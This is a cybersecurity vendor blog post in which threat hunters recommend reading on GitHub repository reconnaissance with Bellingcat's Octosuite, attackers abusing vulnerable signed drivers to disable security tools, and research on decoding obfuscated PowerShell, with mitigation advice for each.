Examine our research from the last year in the ReliaQuest 2024 Annual Cyber-Threat Report
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
March 26, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
Welcome to our new blog series, in which ReliaQuest teammates recommend interesting stories that you might find useful in your day to day jobs. This month, I’m joined by my colleagues, threat hunters George Paco and Jonny Elrod. Here is what we are reading.
The bottom line up front: Adversaries are conducting reconnaissance on your company’s GitHub repositories, and Bellingcat’s new tool, Octosuite, will make it easier for you to find and remediate risks before the bad guys exploit them.
You are hopefully familiar with GitHub, but if you aren’t, “GitHub is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere.” If your company has developers, they are likely using GitHub or a competing solution like GitLab.
Many developers believe that their code repositories are private when they are actually public, and sensitive data is leaked out. Misconfigurations have led to bad actors gaining private SSH keys, account credentials, and even AWS keys. Attackers also target developers so that they can gain access to their GitHub accounts. Many high-profile intrusions have started with bad actors gaining access to GitHub.
If you aren’t familiar with Bellingcat, they are a well-respected and world-renowned “independent international collective of researchers, investigators and citizen journalists using open source and social media investigation to probe a variety of subjects.” When an organization with the pedigree of Bellingcat puts out an OSINT tool, it is worth checking out. “Octosuite is an advanced GitHub framework written in Python that uses GitHub’s Public API to make the process of investigating accounts and repositories on the platform more efficient while also creating a set of automated and easily reproducible queries.” If you are concerned about the risks to your GitHub, and you should be, check out Octosuite.
The bottom line up front: Threat actors utilize legacy drivers to gain kernel access and disable security monitoring. Hardening against these attack vectors could save your company headache and pain.
“Hacking involves a different way of looking at problems that no one’s thought of.” – Walter O’Brien
Hacking is the repurposing of software or devices to produce different outputs than the intended use for the hacker’s benefit. After initial access, most threat actors will attempt to elevate privileges, disable security tools, and establish persistence. Many environments don’t alert on malicious use of trusted, legacy, or signed third-party drivers. Thus, threat actors can exploit these drivers, giving them access to kernel memory. This technique can be called Bring Your Own Vulnerable Driver (BYOVD)—which is basically like bringing your own keys to the bank vault.
ESET has reported APT groups like Lazarus Group utilizing a signed, legitimate Dell driver, “DBUtil_2_3.sys”, and exploiting CVE-2021-21551 to elevate privileges and gain kernel write permissions. Once they gained kernel access, Lazarus Group could disable EDR monitoring.
Sophos reported a similar attack where Blackbyte exploited the drivers “RTCore64.sys” and “RTCore32.sys” within “Micro-Star’s MSI Afterburner 4.6.2.15658” via CVE-2019-16098. The report states that “a whopping list of over 1,000 drivers on which security products rely on to provide protection” can be disabled from this technique. Like Lazarus Group, the end goal was to disable security controls after gaining initial access.
Mitigating these attacks requires security teams to follow Microsoft’s recommended driver block rules. I also recommend using Hypervisor-Protected Code Integrity (HVCI). Windows 11 users can leverage the Windows 11 2022 update, which by default enables “Microsoft Vulnerable Drive Blocklist.”
It’s always a cat-and-mouse game with adversaries. To combat the pervasive use of PowerShell obfuscation by threat actors, a group of Taiwanese researchers developed a reliable way of de-obfuscating and classifying the behavior of PowerShell code automatically through deep learning. If you’re unfamiliar with PowerShell obfuscation, it is the process of generating commands so that their intent is hidden. This obfuscation makes incident responders’ jobs much more difficult. PowerShell obfuscation comes in many forms. For some practical examples of decoding obfuscated PowerShell, see MattNotMax’s CyberChef Recipe guide in GitHub.
The authors first had to solve the problem of identification. Before performing de-obfuscation, you need to understand how a particular PowerShell command is obfuscated. PowerShell has many features which can be used for obfuscation, including string manipulation, encoding, and compression. The researchers took the measure of the entropy of character distribution for each obfuscation method for use as a distinguishing metric. With an extensive training data set of obfuscated PowerShell commands, the researcher’s machine learning algorithm was able to use the measurement of character distribution to make accurate predictions on the type of obfuscation in place. From there, the researchers applied the appropriate regex string replacement method to decode the PowerShell command.
With a reliable decoder, the authors set about to statically profile the expected behavior of the PowerShell command. A foolproof method of doing this is to parse the PowerShell command into an Abstract Syntax Tree (AST) which effectively breaks the PowerShell command into its base elements. The PowerShell language introduces a lot of flexibility in that the same function can be accomplished using different methods. PowerShell cmdlets can be invoked using aliases that can be shortened. Parsing a PowerShell command into its corresponding AST removes ambiguity by reducing its complexity. The researchers chose to use only a few behavior classifications: sleep, known malware, code injection, byte usage, and downloader. By feeding the ASTs of the decoded PowerShell commands into their machine-learning algorithm, the authors could reach a high level of accuracy with the profiling of PowerShell behavior.
If you’re interested in PowerShell decoding solutions but need a Ph. D. in data science, don’t despair! Using a more straightforward method of decoding PowerShell commands, Palo Alto Networks researchers demonstrated that PowerShell could be decoded using simple regex matches, with no data science required. In a tool developed using Python, the Palo Alto Networks team laid out a process of recursively matching and replacing obfuscated PowerShell commands. The script then runs a keyword search on the decoded PowerShell script to look for behavioral indicators. While the programmatic approach to decoding PowerShell commands has shortcomings and won’t work in every case, it proves an adequate substitute for machine learning, especially when you don’t have a bench of data scientists.